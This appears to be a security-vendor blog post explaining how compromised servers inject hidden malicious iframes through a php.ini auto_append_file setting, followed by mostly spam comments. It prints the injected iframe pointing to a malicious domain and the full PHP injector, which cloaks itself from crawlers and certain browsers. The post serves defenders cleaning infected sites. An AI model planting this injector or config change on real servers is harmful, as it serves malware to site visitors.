Is your site infected with malware, and you can’t find it anywhere? It might be a good idea to search outside of your web directory, and look in your main configuration files (specially if you are on a dedicated/VPS server).
We are seeing an increased number of infected sites with malicious iframes, similar to this one:
<style type=”text/css”>#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id=”doxig” src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>
These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:
;auto_append_file = “0ff”
This simple line in the php.ini makes all the php scripts append the output of the file 0ff (/tmp/0ff) to them. So even if your files look clean, the malware is still displayed to anyone visiting the site.
This is the code of the 0ff file:
<?php
if(!@isset($_COOKIE[‘PHPSESS1D’]) &&
!@preg_match(‘/; Yandex|; Googlebot|linux|macintosh|android|Symbian|iPhone|
Mac OS|Opera Mini|Chrome|Apple/i’,$_SERVER[‘HTTP_USER_AGENT’])) {
echo ‘<script type="text/javascript">
d=new Date();
d.setDate(d.getDate()+1);
document.cookie="PHPSESS1D=1; path=/; expires=" + d.toGMTString();
</script>’;
echo ‘<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;
visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="
http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>’;
}
So if you are seeing those hidden iframes, try to look at your PHP and main Apache configurations.
Need help with malware? Need someone to clean your site? Sign up here: Sucuri
6 comments
Yeah lol, a “vulnerability” that is a legitimate and docummented directive of PHP… If you leave your php.ini unprotected, it’s really your own fault, not phps…
Anyway it’s a bad idea, most of distro’s around empty /tmp at boot by default. It will get deleted just rebooting.
How is the php.ini being modified, are you finding this happening in setups with incorrect permissions, are they being uploaded, or is another vulnerability being exploited?
pratik bilgiler
2012 pratik bilgiler
pratik
2013 pratik bilgiler
thankkksss..
It might be a good idea to search outside
of your web directory, and look in your main configuration files. I have share this blog to my friends. That is of great utility. Thanks for
sharing this info.
Hire PHP Developers | Hire PHP Programmers | PHP Website Development Company
your thinking is really up to date and i really agree with your thinking with this matter.please write some more information in this matter.great article with useful information.
http://www.smtrafficguru.com
Comments are closed.